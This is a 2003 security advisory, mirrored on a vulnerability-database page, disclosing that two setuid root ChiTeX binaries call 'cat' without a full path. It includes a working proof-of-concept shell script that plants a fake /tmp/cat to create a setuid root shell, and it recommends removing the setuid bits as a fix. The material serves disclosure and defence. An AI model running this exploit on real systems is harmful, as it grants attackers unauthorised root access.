Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

safemode-adv-chitext.txt

🗓️ 03 Apr 2003 00:00:00Reported by ZillionType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

ChiTeX vulnerability allows local users to gain root privileges via path manipulation in binaries.

Show more
Code
`  
==================================================================  
Safemode.org security advisory: CHITEX   
==================================================================  
  
Introduction:  
=============  
  
ChiTeX can be used to put Chinese Big5 codes in TeX/LaTeX documents.  
Operations with the ChiTeX are just like the English TeX, apart  
from some special instructions in it. For more information about  
this package, refer to the homepage of the author Chen Hung-Yih:  
  
http://www.math.ncu.edu.tw/~yih/intro.htm (Chinese)  
  
The ChiTeX packages contains 2 setuid root binaries that execute  
cat without using an explicit path. This bug can allow local users  
to gain root level privileges.  
  
Affected versions:  
==================  
  
ChiTeX version 6.1.2p7.8-1 was tested to be vulnerable. It is very  
likely that this issue also affects other, especially older,  
versions of ChiTeX.  
  
Problem description:  
====================  
  
The setuid root binaries chadd and chaddpfbname use the following  
system() functions:  
  
chadd:  
system("cat special.tmp >> $TEXMF/fontname/special.map");  
  
chaddpfbname:  
system("cat psfontsmap@ >> $psfontsmap");  
system("cat psfontsmap@ >> $pdftexmap");  
  
As you can see, cat is executed without using a full path. If a user   
creates a file called 'cat' in /tmp, adds /tmp to $PATH and then  
executes chadd or chaddpfbname, the cat file will be executed with  
root privileges.  
  
A user can also create a file named 'psfontsmap@' and let chaddpfbname  
append this file's content to any file defined in the $pdftexmap  
or $psfontsmap environment variables.  
  
The script below will demonstrate this vulnerability by creating  
a setuid root shell and the file /tmp/owned (with 'owned' as content)   
  
--- start ---  
  
#!/bin/sh  
echo 'owned' > 'psfontsmap@'  
export psfontsmap=/tmp/owned  
echo "/bin/cp /bin/sh /tmp/.sh" > /tmp/cat  
echo "/bin/chmod 4755 /tmp/.sh" >> /tmp/cat  
chmod +x /tmp/cat  
cd /tmp  
export PATH="/tmp:$PATH"  
/usr/local/bin/chaddpfbname  
/tmp/.sh -c id  
/tmp/.sh  
  
--- stop ---  
  
Note this is simple proof of concept code: you might have to change the path  
to chaddpfbname.   
  
Fix information:  
================  
  
The author, professor Chen Hung-Yih, was been notified about this   
issue several weeks ago but unfortunately, did not release a fix  
yet.  
  
Remove the setuid permissions from the binaries.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Apr 2003 00:00Current
7.4High risk
Vulners AI Score7.4
chitex vulnerabilitylocal user accessroot privilegessetuid binariespath manipulation.
31
.json
Report